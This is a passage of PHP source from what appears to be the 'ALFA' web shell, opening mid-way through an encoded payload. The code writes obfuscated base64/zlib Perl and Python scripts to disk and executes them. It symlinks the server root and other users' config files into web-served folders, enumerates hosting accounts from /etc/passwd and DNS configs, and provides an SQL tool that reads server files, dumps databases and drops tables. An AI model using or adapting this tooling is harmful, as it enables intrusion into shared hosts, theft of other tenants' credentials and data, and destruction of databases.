44LPcOKqVMmuU1qwysR3hHjasr7Wcq/m9JpZNZcndd7T3KKNGu/dmnSv1EXa8fEQIVIWRbAjj0vZ5aZqWZ62nN6+1dtKsSp+BVcrx4xdV1zV7hGLqcNeIFwBwaq2RnBLWddTXQTQUVFkhShXWrSq3GLRelXT75q+WRbMEEdX4yKbpaSp+74aK/TI0PYQnvFMVmQ90/zPuv3yQSnbWCnfySBiTwOXVfIL9KCfgm4ucGVxg5fWS0xXUOsaC2n/UQbxE01kkAEiRZbwiL2KoPXmOjjFXCIP9R7XpkeflOPjg3qlMw6CQhLu/kBT13m5/x1mPmRYsLINtHKDkoGvPWnVOdoCjbkOCV13XAVaKPkAixRcc2csUbzRzQ0qv9QqWB3Z0UDl1qmoKbVkFN4bTESvCgM1zAgQGe7CGNB48utZTCwL5nFuyTP7YvvS1iopwmqtuga9HVzaYm6RugaaHPxQNREqQ4itf6lM/FYyFXtlmX8G7NUN/DWEfer4vsQXdDYDhjVGdQvqzCutRS9al6iDdjyvtI/GrYYL1e52a5PYWs1i0C6lSqTktHMJnVpYcVdIVzoTb3SmiJFKFOuWymsdEXouE/giMCQWEQPlPT2Ul72ysWzL4lQPeih5EPLRnYhv1QIc1+KbaKtEjwWzcE5LBbOlUBu+Fnjg3AyatSD2Kth5VAGDHPehJXALgGXDGSZQzLsI3mM+kdazUVPNFtXIARgwxzBeyPMt5IEvKmRbGKc6fnAqFSzvHNYAaEpHYgf0qBJEzr9WYyGOVFvC8k3A3YtXrwJtZz/IZ2xi1WiAHqLr6sKwDU65JVXF0waCOnUeEw0CcrNwfriB2AOhABs4lA3EVQUSfkUnEUPhenoF/dWqz6AgpLe7s6PHO1/Gy3N1G4S73pm4DZ7J2+BJeRscpKe5uPIy+ETogjJ0nCVJdg31+gMQZIP0nRw+smIpAeSVUuM6OVx6BmmfkHO4iKt7eJ5A+0D5JBd/20hAJAheSF3QAfYPnBIY9H8BXEf6SM2TsABv9EDFO1O3M+E4iihj5TUcwne0ltrrSUFQ0NDqGvX41C6D9Fl1J9w0WUHaq0ncKhuKLqbl13JYkylSXlcrL2onyv9SgA//A3Qr5vcvEQAA")));';
5852. $py = '#!/usr/bin/python' . "\nimport zlib, base64\n" . 'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5853. $cginame = "symperl.alfa";
5854. $source = $perl;
5855. $lang = "perl";
5856. if ($_POST["alfa2"] == "sympy")
5857. {
5858. $cginame = "pysymlink.alfa";
5859. $source = $py;
5860. $lang = "python";
5861. }
5862. @__write_file($cginame, $source);
5863. @chmod($cginame, 0755);
5864. echo __pre();
5865. $resource = alfaEx("{$lang} {$cginame} {$sympath}", false, true, true);
5866. if (strlen($resource) == 0)
5867. {
5868. echo AlfaiFrameCreator('cgialfa/' . $cginame);
5869. }
5870. else
5871. {
5872. echo $resource;
5873. }
5874. }
5875. if (isset($_POST['alfa4']) && $_POST['alfa4'] == 'SymFile')
5876. {
5877. if (function_exists('symlink') || _alfa_can_runCommand(true, true))
5878. {
5879. echo __pre() . '
5880. <center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
5881. <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
5882. <input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
5883. <p><input type="submit" value=" " name="symlink" /></p></form></center>';
5884. $path = $_POST['alfa5'];
5885. $symname = $_POST['alfa6'];
5886. $solevisible58 = $_POST['alfa7'];
5887. if ($solevisible58)
5888. {
5889. $new_name = str_replace(".", "_", basename($symname));
5890. $rand_dir = $new_name . rand(111, 9999);
5891. $sym_dir = 'alfasymlinkphp/' . $rand_dir . '/';
5892. @mkdir($sym_dir, 0777, true);
5893. alfacgihtaccess('sym', $sym_dir, $symname);
5894. _alfa_symlink("$path", "$sym_dir/$symname");
5895. echo __pre();
5896. echo '<center><b><font color="white">Click >> </font><a target="_blank" href="' . $sym_dir . '" ><b><font size="4">' . $symname . '</font></b></a></b></center>';
5897. }
5898. }
5899. else
5900. {
5901. echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
5902. }
5903. }
5904. if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'symphp')
5905. {
5906. $cant_symlink = true;
5907. if (function_exists('symlink') || _alfa_can_runCommand(false, false))
5908. {
5909. @mkdir('alfasymlink', 0777);
5910. alfacgihtaccess('sym', 'alfasymlink/');
5911. _alfa_symlink('/', 'alfasymlink/root');
5912. $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
5913. if (_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/"))
5914. {
5915. echo "<center>";
5916. $lines = array();
5917. $anony_domains = array();
5918. $anonymous_users = array();
5919. $f_black = array();
5920. $error = false;
5921. $anonymous = false;
5922. $makepwd = "/home/{user}/public_html/";
5923. $domains = alfaGetDomains();
5924. $lines = $domains["lines"];
5925. $state = $domains["state"];
5926. $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
5927. $can_runcmd = _alfa_can_runCommand(false, false);
5928. if (!$is_posix && !$can_runcmd)
5929. {
5930. $anonymous = true;
5931. $anony_domains = $domains["lines"];
5932. $lines = _alfa_file('/etc/passwd');
5933. }
5934. echo $table_header;
5935. $count = 1;
5936. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
5937. foreach ($lines as $line)
5938. {
5939. $domain = "";
5940. $owner = "";
5941. if ($anonymous)
5942. {
5943. $explode = explode(":", $line);
5944. $owner = $explode[0];
5945. $owner_len = strlen($owner) - 1;
5946. $userid = $explode[2];
5947. if ((int)$userid < 500) continue;
5948. $domain = "[?????]";
5949. $temp_black = array();
5950. $finded = false;
5951. foreach ($anony_domains as $anony)
5952. {
5953. if ($state == "named.conf")
5954. {
5955. if (@strstr($anony, 'zone'))
5956. {
5957. preg_match_all('#zone "(.*)"#', $anony, $data);
5958. $domain = $data[1][0];
5959. }
5960. else
5961. {
5962. continue;
5963. }
5964. }
5965. elseif ($state == "named" || $state == "valiases")
5966. {
5967. if ($anony == "." || $anony == "..") continue;
5968. if ($state == "named") $anony = rtrim($anony, ".db");
5969. $domain = $anony;
5970. }
5971. $sub_domain = str_replace(array(
5972. "-",
5973. "."
5974. ) , "", $domain);
5975. if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len))
5976. {
5977. if (in_array($owner . $domain, $temp_black)) continue;
5978. $sympath = str_replace("{user}", $owner, $makepwd);
5979. $http = "http://" . $domain;
5980. echo str_replace(array(
5981. "{count}",
5982. "{http}",
5983. "{domain}",
5984. "{owner}",
5985. "{sympath}"
5986. ) , array(
5987. $count,
5988. $http,
5989. $domain,
5990. $owner,
5991. $sympath
5992. ) , $template);
5993. $count++;
5994. $temp_black[] = $owner . $domain;
5995. $finded = true;
5996. }
5997. }
5998. if (!$finded)
5999. {
6000. $anonymous_users[] = $owner;
6001. }
6002. }
6003. else
6004. {
6005. if ($state == "named.conf")
6006. {
6007. if (@strstr($line, 'zone'))
6008. {
6009. preg_match_all('#zone "(.*)"#', $line, $data);
6010. $domain = $data[1][0];
6011. }
6012. else
6013. {
6014. continue;
6015. }
6016. }
6017. elseif ($state == "named" || $state == "valiases")
6018. {
6019. if ($line == "." || $line == "..") continue;
6020. if ($state == "named") $line = rtrim($line, ".db");
6021. $domain = $line;
6022. }
6023. if (strlen(trim($domain)) > 2 && $state != "passwd")
6024. {
6025. if (!_alfa_file_exists('/etc/valiases/' . $domain, false)) continue;
6026. if ($is_posix)
6027. {
6028. $user = @posix_getpwuid(@fileowner('/etc/valiases/' . $domain));
6029. $owner = $user["name"];
6030. }
6031. elseif ($can_runcmd)
6032. {
6033. $owner = alfaEx("stat -c '%U' /etc/valiases/" . $domain, false, false);
6034. }
6035. }
6036. }
6037. if (!$anonymous)
6038. {
6039. if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) continue;
6040. $sympath = str_replace("{user}", $owner, $makepwd);
6041. $http = "http://" . $domain;
6042. if ($state == "passwd")
6043. {
6044. $http = "javascript:alert('we cant find domain...')";
6045. }
6046. echo str_replace(array(
6047. "{count}",
6048. "{http}",
6049. "{domain}",
6050. "{owner}",
6051. "{sympath}"
6052. ) , array(
6053. $count,
6054. $http,
6055. $domain,
6056. $owner,
6057. $sympath
6058. ) , $template);
6059. $count++;
6060. $f_black[] = $owner . $domain;
6061. }
6062. }
6063. if ($anonymous)
6064. {
6065. foreach ($anonymous_users as $owner)
6066. {
6067. $sympath = str_replace("{user}", $owner, $makepwd);
6068. $http = "javascript:alert('we cant find domain...')";
6069. echo str_replace(array(
6070. "{count}",
6071. "{http}",
6072. "{domain}",
6073. "{owner}",
6074. "{sympath}"
6075. ) , array(
6076. $count,
6077. $http,
6078. "[????]",
6079. $owner,
6080. $sympath
6081. ) , $template);
6082. $count++;
6083. }
6084. }
6085. $cant_symlink = false;
6086. }
6087. else
6088. {
6089. $is_direct = false;
6090. $makepwd = alfaMakePwd();
6091. if (_alfa_file_exists("/etc/virtual/domainowners"))
6092. {
6093. $makepwd = "/home/{user}/public_html";
6094. $is_direct = true;
6095. }
6096. $sole = _alfa_file("/etc/virtual/domainowners");
6097. $count = 1;
6098. echo $table_header;
6099. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
6100. if ($sole)
6101. {
6102. foreach ($sole as $visible)
6103. {
6104. if (@strstr($visible, ":"))
6105. {
6106. $solevisible = explode(':', $visible);
6107. $cwd = str_replace("{user}", trim($solevisible[1]) , $makepwd);
6108. echo str_replace(array(
6109. "{count}",
6110. "{user}",
6111. "{url}",
6112. "{cwd}"
6113. ) , array(
6114. $count++,
6115. trim($solevisible[1]) ,
6116. trim($solevisible[0]) ,
6117. $cwd
6118. ) , $template);
6119. }
6120. }
6121. }
6122. else
6123. {
6124. $passwd = _alfa_file("/etc/passwd");
6125. if ($passwd)
6126. {
6127. $html = "";
6128. $is_named = false;
6129. $users = array();
6130. $domains = array();
6131. $uknowns = array();
6132. foreach ($passwd as $user)
6133. {
6134. $user = trim($user);
6135. $expl = explode(":", $user);
6136. if ((int)$expl[2] < 500) continue;
6137. $users[$expl[0]] = $expl[5];
6138. }
6139. $site_domains = @scandir("/etc/virtual/");
6140. if (!$site_domains)
6141. {
6142. $site_domains = alfaEx("ls /etc/virtual/");
6143. $site_domains = explode("\n", $site_domains);
6144. if (!$site_domains)
6145. {
6146. $site_domains = _alfa_file("/etc/named.conf");
6147. if ($site_domains)
6148. {
6149. $is_named = true;
6150. }
6151. }
6152. }
6153. foreach ($site_domains as $line)
6154. {
6155. if ($is_named)
6156. {
6157. if (@strstr($line, 'zone'))
6158. {
6159. preg_match_all('#zone "(.*)"#', $line, $data);
6160. $domain = $data[1][0];
6161. if (strlen($domain > 2) && !empty($domain))
6162. {
6163. $domains[] = $domain;
6164. }
6165. }
6166. }
6167. else
6168. {
6169. $domains[] = $line;
6170. }
6171. }
6172. $x = 1;
6173. foreach ($users as $user => $home)
6174. {
6175. foreach ($domains as $domain)
6176. {
6177. $user_len = strlen($user) - 1;
6178. $sub_domain = str_replace(array(
6179. "-",
6180. "."
6181. ) , "", $domain);
6182. $five_user = substr($user, 0, $user_len);
6183. $five_domain = substr($sub_domain, 0, $user_len);
6184. if ($five_user == $five_domain)
6185. {
6186. if ($is_direct)
6187. {
6188. $cwd = str_replace("{user}", $user, $makepwd);
6189. }
6190. else
6191. {
6192. $expl = explode("}/", $makepwd);
6193. $cwd = $home . "/" . $expl[1];
6194. }
6195. $html .= str_replace(array(
6196. "{count}",
6197. "{user}",
6198. "{url}",
6199. "{cwd}"
6200. ) , array(
6201. $x++,
6202. $user,
6203. $domain,
6204. $cwd
6205. ) , $template);
6206. }
6207. else
6208. {
6209. $uknowns[$user] = $home;
6210. }
6211. }
6212. }
6213. $uknowns = array_unique($uknowns);
6214. foreach ($uknowns as $user => $home)
6215. {
6216. if ($is_direct)
6217. {
6218. $cwd = str_replace("{user}", $user, $makepwd);
6219. }
6220. else
6221. {
6222. $expl = explode("}/", $makepwd);
6223. $cwd = $home . "/" . $expl[1];
6224. }
6225. $html .= str_replace(array(
6226. "{count}",
6227. "{user}",
6228. "{url}",
6229. "{cwd}"
6230. ) , array(
6231. $x++,
6232. $user,
6233. "[?????]",
6234. $cwd
6235. ) , $template);
6236. }
6237. echo ($html);
6238. }
6239. }
6240. echo "</table>";
6241. $cant_symlink = false;
6242. }
6243. }
6244. else
6245. {
6246. echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
6247. $cant_symlink = false;
6248. }
6249. if ($cant_symlink) echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
6250. echo "</center></table>";
6251. }
6252. echo "</div>";
6253. alfafooter();
6254. }
6255. function alfasql()
6256. {
6257. if (!isset($_POST['sql_host']))
6258. {
6259. $_POST['sql_host'] = $_SESSION["sql_host"];
6260. $_POST['sql_login'] = $_SESSION["sql_login"];
6261. $_POST['sql_pass'] = $_SESSION["sql_pass"];
6262. $_POST['sql_base'] = $_SESSION["sql_base"];
6263. }
6264. class DbClass
6265. {
6266. public $type;
6267. public $link;
6268. public $res;
6269. function __construct($type)
6270. {
6271. $this->type = $type;
6272. }
6273. function connect($host, $user, $pass, $dbname)
6274. {
6275. switch ($this->type)
6276. {
6277. case 'mysql':
6278. if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) return true;
6279. break;
6280. case 'pgsql':
6281. $host = explode(':', $host);
6282. if (!$host[1]) $host[1] = 5432;
6283. if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
6284. break;
6285. }
6286. return false;
6287. }
6288. function selectdb($db)
6289. {
6290. switch ($this->type)
6291. {
6292. case 'mysql':
6293. if (@mysqli_select_db($db)) return true;
6294. break;
6295. }
6296. return false;
6297. }
6298. function query($str)
6299. {
6300. switch ($this->type)
6301. {
6302. case 'mysql':
6303. return $this->res = @mysqli_query($this->link, $str);
6304. break;
6305. case 'pgsql':
6306. return $this->res = @pg_query($this->link, $str);
6307. break;
6308. }
6309. return false;
6310. }
6311. function fetch()
6312. {
6313. $res = func_num_args() ? func_get_arg(0) : $this->res;
6314. switch ($this->type)
6315. {
6316. case 'mysql':
6317. return @mysqli_fetch_assoc($res);
6318. break;
6319. case 'pgsql':
6320. return @pg_fetch_assoc($res);
6321. break;
6322. }
6323. return false;
6324. }
6325. function listDbs()
6326. {
6327. switch ($this->type)
6328. {
6329. case 'mysql':
6330. return $this->query("SHOW databases");
6331. break;
6332. case 'pgsql':
6333. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
6334. break;
6335. }
6336. return false;
6337. }
6338. function listTables()
6339. {
6340. switch ($this->type)
6341. {
6342. case 'mysql':
6343. return $this->res = $this->query('SHOW TABLES');
6344. break;
6345. case 'pgsql':
6346. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
6347. break;
6348. }
6349. return false;
6350. }
6351. function error()
6352. {
6353. switch ($this->type)
6354. {
6355. case 'mysql':
6356. return @mysqli_error($this->link);
6357. break;
6358. case 'pgsql':
6359. return @pg_last_error();
6360. break;
6361. }
6362. return false;
6363. }
6364. function setCharset($str)
6365. {
6366. switch ($this->type)
6367. {
6368. case 'mysql':
6369. if (function_exists('mysql_set_charset')) return @mysqli_set_charset($this->link, $str);
6370. else $this->query('SET CHARSET ' . $str);
6371. break;
6372. case 'pgsql':
6373. return @pg_set_client_encoding($this->link, $str);
6374. break;
6375. }
6376. return false;
6377. }
6378. function loadFile($str)
6379. {
6380. switch ($this->type)
6381. {
6382. case 'mysql':
6383. return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
6384. break;
6385. case 'pgsql':
6386. $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '" . addslashes($str) . "';select file from solevisible;");
6387. $r = array();
6388. while ($i = $this->fetch()) $r[] = $i['file'];
6389. $this->query('drop table solevisible');
6390. return array(
6391. 'file' => implode("\n", $r)
6392. );
6393. break;
6394. }
6395. return false;
6396. }
6397. function dump($table, $fp = false)
6398. {
6399. switch ($this->type)
6400. {
6401. case 'mysql':
6402. $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
6403. $create = mysqli_fetch_array($res);
6404. $sql = $create[1] . ";\n";
6405. if ($fp) fwrite($fp, $sql);
6406. else echo ($sql);
6407. $this->query('SELECT * FROM `' . $table . '`');
6408. $head = true;
6409. while ($item = $this->fetch())
6410. {
6411. $columns = array();
6412. foreach ($item as $k => $v)
6413. {
6414. if ($v == null) $item[$k] = "''";
6415. elseif (is_numeric($v)) $item[$k] = $v;
6416. else $item[$k] = "'" . @mysqli_real_escape_string($this->link, $v) . "'";
6417. $columns[] = "`" . $k . "`";
6418. }
6419. if ($head)
6420. {
6421. $sql = 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
6422. $head = false;
6423. }
6424. else $sql = "\n\t,(" . implode(", ", $item) . ')';
6425. if ($fp) fwrite($fp, $sql);
6426. else echo ($sql);
6427. }
6428. if (!$head) if ($fp) fwrite($fp, ";\n\n");
6429. else echo (";\n\n");
6430. break;
6431. case 'pgsql':
6432. $this->query('SELECT * FROM ' . $table);
6433. while ($item = $this->fetch())
6434. {
6435. $columns = array();
6436. foreach ($item as $k => $v)
6437. {
6438. $item[$k] = "'" . addslashes($v) . "'";
6439. $columns[] = $k;
6440. }
6441. $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
6442. if ($fp) fwrite($fp, $sql);
6443. else echo ($sql);
6444. }
6445. break;
6446. }
6447. return false;
6448. }
6449. };
6450. $db = new DbClass($_POST['type']);
6451. if (@$_POST['alfa1'] == 'dumpfile' || @$_POST['alfa1'] == 'droptbl')
6452. {
6453. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
6454. $db->selectdb($_POST['sql_base']);
6455. switch ($_POST['charset'])
6456. {
6457. case "Windows-1251":
6458. $db->setCharset('calfa1251');
6459. break;
6460. case "UTF-8":
6461. $db->setCharset('utf8');
6462. break;
6463. case "KOI8-R":
6464. $db->setCharset('koi8r');
6465. break;
6466. case "KOI8-U":
6467. $db->setCharset('koi8u');
6468. break;
6469. case "calfa866":
6470. $db->setCharset('calfa866');
6471. break;
6472. }
6473. $json = json_decode($_POST['alfa2'], true);
6474. if (count($json['tbl']) > 0)
6475. {
6476. if ($_POST['alfa1'] == 'dumpfile')
6477. {
6478. if ($fp = @fopen($json['file'], 'w'))
6479. {
6480. foreach ($json['tbl'] as $v) $db->dump($v, $fp);
6481. fclose($fp);
6482. $dumpStatus = true;
6483. }
6484. }
6485. else
6486. {
6487. foreach ($json['tbl'] as $v) $db->query('DROP TABLE ' . $v);
6488. }
6489. }
6490. unset($_POST['alfa2']);
6491. }
6492. alfahead();
6493. echo "
6494. <div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>" . getConfigHtml('all') . "</p></center>
6495. <form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
6496. <td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
6497. <input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : 'UTF-8') . "'>
6498. <td><select name='type'><option value='mysql' ";
6499. if (@$_POST['type'] == 'mysql') echo 'selected';
6500. echo ">MySql</option><option value='pgsql' ";
6501. if (@$_POST['type'] == 'pgsql') echo 'selected';
6502. echo ">PostgreSql</option></select></td>
6503. <td><input type='text' name='sql_host' id='db_host' value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>
6504. <td><input type='text' name='sql_login' id='db_user' value='" . (empty($_POST['sql_login']) ? '' : htmlspecialchars($_POST['sql_login'])) . "'></td>
6505. <td><input type='text' name='sql_pass' id='db_pw' value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
6506. $tmp = "<input type='text' name='sql_base' id='db_name' value='" . (empty($_POST['sql_base']) ? '' : htmlspecialchars($_POST['sql_base'])) . "'>";
6507. if (isset($_POST['sql_host']))
6508. {
6509. if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']))
6510. {
6511. $_SESSION["sql_host"] = $_POST['sql_host'];
6512. $_SESSION["sql_login"] = $_POST['sql_login'];
6513. $_SESSION["sql_pass"] = $_POST['sql_pass'];
6514. $_SESSION["sql_base"] = $_POST['sql_base'];
6515. switch ($_POST['charset'])
6516. {
6517. case "Windows-1251":
6518. $db->setCharset('calfa1251');
6519. break;
6520. case "UTF-8":
6521. $db->setCharset('utf8');
6522. break;
6523. case "KOI8-R":
6524. $db->setCharset('koi8r');
6525. break;
6526. case "KOI8-U":
6527. $db->setCharset('koi8u');
6528. break;
6529. case "calfa866":
6530. $db->setCharset('calfa866');
6531. break;
6532. }
6533. $db->setCharset('utf8');
6534. $db->listDbs();
6535. echo "<select name=sql_base><option value=''></option>";
6536. while ($item = $db->fetch())
6537. {
6538. list($key, $value) = each($item);
6539. echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
6540. }
6541. echo '</select>';
6542. }
6543. else echo $tmp;
6544. }
6545. else echo $tmp;
6546. echo "</td>
6547. <td><input type='submit' value=' '></td>
6548. <td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
6549. </tr>
6550. </table>
6551. <script>mysql_cache['host']='" . addslashes($_POST['sql_host']) . "';mysql_cache['user']='" . addslashes($_POST['sql_login']) . "';mysql_cache['pass']='" . addslashes($_POST['sql_pass']) . "';mysql_cache['db']='" . addslashes($_POST['sql_base']) . "';mysql_cache['charset']='" . addslashes($_POST['charset']) . "';mysql_cache['type']='" . addslashes($_POST['type']) . "';mysql_cache['count']='" . addslashes($_POST['sql_count']) . "'</script>
6552. ";
6553. if (isset($db) && $db->link)
6554. {
6555. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
6556. if (!empty($_POST['sql_base']))
6557. {
6558. $db->selectdb($_POST['sql_base']);
6559. echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
6560. $tbls_res = $db->listTables();
6561. while ($item = $db->fetch($tbls_res))
6562. {
6563. list($key, $value) = each($item);
6564. if (!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `' . $value . '`'));
6565. $value = htmlspecialchars($value);
6566. echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href='javascript:void(0);' onclick=\"fs('0','" . $value . "')\"><span class='mysql_tables' style='font-weight:unset;'>" . $value . "</span></a>" . (empty($_POST['sql_count']) ? '&nbsp;' : " <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
6567. }
